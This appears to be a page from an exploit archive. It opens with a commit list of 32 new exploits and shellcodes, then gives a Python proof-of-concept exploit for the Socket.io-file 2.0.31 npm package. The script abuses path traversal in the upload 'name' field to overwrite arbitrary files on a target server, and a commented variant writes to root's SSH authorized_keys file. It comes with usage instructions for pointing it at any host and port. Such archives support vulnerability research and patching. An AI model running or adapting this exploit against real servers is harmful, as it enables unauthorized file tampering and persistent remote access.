
32 changes to exploits/shellcodes Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite) Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH) Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter) DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter) Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter) Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH) Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter) docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter) GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated) ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin) WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated) Bludit 3.9.2 - Directory Traversal LibreHealth 2.0.0 - Authenticated Remote Code Execution Online Course Registration 1.0 - Unauthenticated Remote Code Execution elaniin CMS - Authentication Bypass Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated) PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting Bio Star 2.8.2 - Local File Inclusion Webtareas 2.1p - Arbitrary File Upload (Authenticated) F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication) Socket.io-file 2.0.31 - Arbitrary File Upload pfSense 2.4.4-p3 - Cross-Site Request Forgery Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting Rails 5.0.1 - Remote Code Execution Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes) Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes) Windows/x86 - Download using mshta.exe Shellcode (100 bytes)
59 lines
No EOL
2.4 KiB
Text
59 lines
No EOL
2.4 KiB
Text
# Exploit Title: Socket.io-file 2.0.31 - Arbitrary File Upload
|
|
# Date: 2020-07-02
|
|
# Exploit Author: Cr0wTom
|
|
# Vendor Homepage: https://www.npmjs.com/package/socket.io-file
|
|
# Software Link: https://www.npmjs.com/package/socket.io-file/v/2.0.31
|
|
# Version: <= v2.0.31
|
|
# Tested on: node v10.19.0, Socket.io-file v2.0.31, socket.io v2.3.0
|
|
# CVE: -
|
|
|
|
# Requirements: pip install socketIO-client-nexus==0.7.6
|
|
|
|
#!/usr/bin/env python
|
|
|
|
import sys
|
|
import json
|
|
import os
|
|
from socketIO_client_nexus import SocketIO, LoggingNamespace
|
|
|
|
def file_creation(RHOST, RPORT):
|
|
print ('Initiating connection...')
|
|
with SocketIO(RHOST, RPORT, LoggingNamespace) as socketIO:
|
|
|
|
print ('Creating file...')
|
|
|
|
# Example server running in /home/testuser/Documents/socket-app so customize the path appropriately
|
|
# Change the "name" option if you want to create an other file in an different path of the system
|
|
socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../client/index.html","size":1,"chunkSize":10240,"sent":0,"data":{}})
|
|
|
|
# Example for server running with root access:
|
|
# socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../../../../../root/.ssh/authorized_keys","size":1,"chunkSize":10240,"sent":0,"data":{}})
|
|
|
|
print ('Writing data to file...')
|
|
|
|
# Add the data you want to get written to the file
|
|
data = "Exploited by Cr0wTom"
|
|
json_string = json.dumps(data)
|
|
socketIO.once("socket.io-file::request::u_0", on_aaa_response)
|
|
socketIO.emit("socket.io-file::stream::u_0", json_string)
|
|
|
|
def on_aaa_response(*args):
|
|
print('on_aaa_response', args)
|
|
|
|
def print_usage():
|
|
print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality')
|
|
print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n')
|
|
print ('Usage: python3 exploit.py <RHOST> <RPORT>')
|
|
print ('RHOST The target host IP address or domain.')
|
|
print ('RPORT The target host port number of the nodejs server.')
|
|
|
|
if __name__ == '__main__':
|
|
|
|
# ensure we have at least an IP and Port
|
|
if len(sys.argv) < 3:
|
|
print_usage()
|
|
sys.exit(1)
|
|
|
|
print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality')
|
|
print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n')
|
|
file_creation(sys.argv[1], sys.argv[2]) |